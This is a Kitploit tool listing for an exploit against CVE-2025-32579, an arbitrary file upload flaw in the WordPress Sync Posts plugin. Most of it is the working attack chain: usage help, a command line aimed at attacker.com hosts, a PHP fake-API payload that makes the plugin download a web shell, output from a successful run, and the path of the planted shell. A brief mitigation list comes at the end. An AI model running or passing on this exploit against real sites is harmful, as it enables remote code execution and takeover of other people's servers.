Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-32579 — WordPress Sync Posts Plugin <= 1.0 is vulnerable to Arbitrary File Upload | Kitploit
Tools/GitHubGitHub/nxploited/cve-2025-32579
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubnxploited/cve-2025-32579

CVE-2025-32579

WordPress Sync Posts Plugin <= 1.0 is vulnerable to Arbitrary File Upload

View Repository
11 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

⚠️ CVE-2025-32579 - Critical RCE via Sync Posts Plugin (WordPress)

📦 Affects: Sync Posts <= 1.0
🧨 CVSS Score: 9.9 CRITICAL
📁 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H


🧠 Vulnerability Overview

The Sync Posts WordPress plugin by SoftClever Limited is vulnerable to an Unrestricted File Upload vulnerability that allows authenticated attackers to upload and execute arbitrary PHP files (such as web shells) on the server.

🔓 Root Cause:

  • The plugin accepts a website_url which returns JSON posts.
  • It blindly fetches images from the post contents without validation.
  • No file type, mime-type, or path restriction is applied.
  • All images (even PHP files) are downloaded and stored inside wp-content/uploads.

🚨 Why It’s Dangerous

  • ✅ Remote Code Execution (RCE)
  • ✅ Uploads web shells directly to server
  • ✅ Requires minimal privileges (Authenticated user only)

⚙️ Script Description (Exploit)

The exploit script automates the full chain:

  1. 📥 Logs into WordPress using provided credentials
  2. 🧠 Generates fake API PHP returning JSON post with a shell as <img src="https://raw.githubusercontent.com/nxploited/cve-2025-32579/HEAD/...">
  3. 📡 Sends malicious website_url to admin-ajax.php?action=sync_posts
  4. 💣 Forces the plugin to fetch and save the shell in /uploads/
  5. ✅ No need for Referer or nonce — session cookie is enough

root@kitploit:~
usage: CVE-2025-32579.py [-h] -u URL -un USERNAME -p PASSWORD -ws WEBSITE -shell WEBSHELL

Exploit For CVE-2025-32579 Sync Posts # By: Nxploited ( Khaled Alenazi )

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress URL (e.g., http://target.com/wordpress)
  -un, --username USERNAME
                        Username to login
  -p, --password PASSWORD
                        Password to login
  -ws, --website WEBSITE
                        URL to fake API (e.g., http://attacker.com/Khaled_alenazi.php)
  -shell, --webshell WEBSHELL
                        Web shell URL used inside the fake API (can be a test image)
                                                                                       

💻 Usage Instructions

📌 Command Format:

root@kitploit:~
python3 CVE-2025-32579.py -u http://target/wordpress -un admin -p pass123 -ws http://attacker.com/Khaled_alenazi.php -shell http://attacker.com/shell.php

⚙️ Arguments:

You can also use a dummy image instead of a real shell for testing:

root@kitploit:~
--webshell https://via.placeholder.com/1x1.jpg

🧪 Example Fake API Output

This is the response returned by Khaled_alenazi.php:

root@kitploit:~
<?php
header('Content-Type: application/json');
echo json_encode([
  [
    "id" => 1,
    "title" => ["rendered" => "Nxploited"],
    "content" => [
      "rendered" => "<img src="http://attacker.com/shell.php">"
    ]
  ]
]);
?>

✅ Successful Exploit:

root@kitploit:~
[*] Attempting login...
[+] Logged in successfully.
[+] Generated fake API PHP file: Khaled_alenazi.php
[+] Sending exploit request to: http://target.com/wordpress
[+] Request sent successfully.
{
  "success": true,
  "data": {
    "message": "Posts imported successfully",
    ...
  }
}

🔥 After successful exploitation:

  • Shell Path and Name: shell.php
  • target.com/wp-content/uploads/2025/04/shell.php

🛠️ Fix / Mitigation

  • Restrict website_url access to internal domains or whitelisted hosts
  • Validate image extensions & content types
  • Avoid parsing third-party JSON without sanitization

🧷 Reference

CVE: CVE-2025-32579
Exploit By Nxploited (Khaled Alenazi)


Download Tool
FlagDescription
-u, --urlTarget WordPress URL
-un, --usernameWordPress username (admin)
-p, --passwordWordPress password
-ws, --websiteURL to malicious PHP file that returns fake post JSON
-shell, --webshellThe actual shell file to inject via ``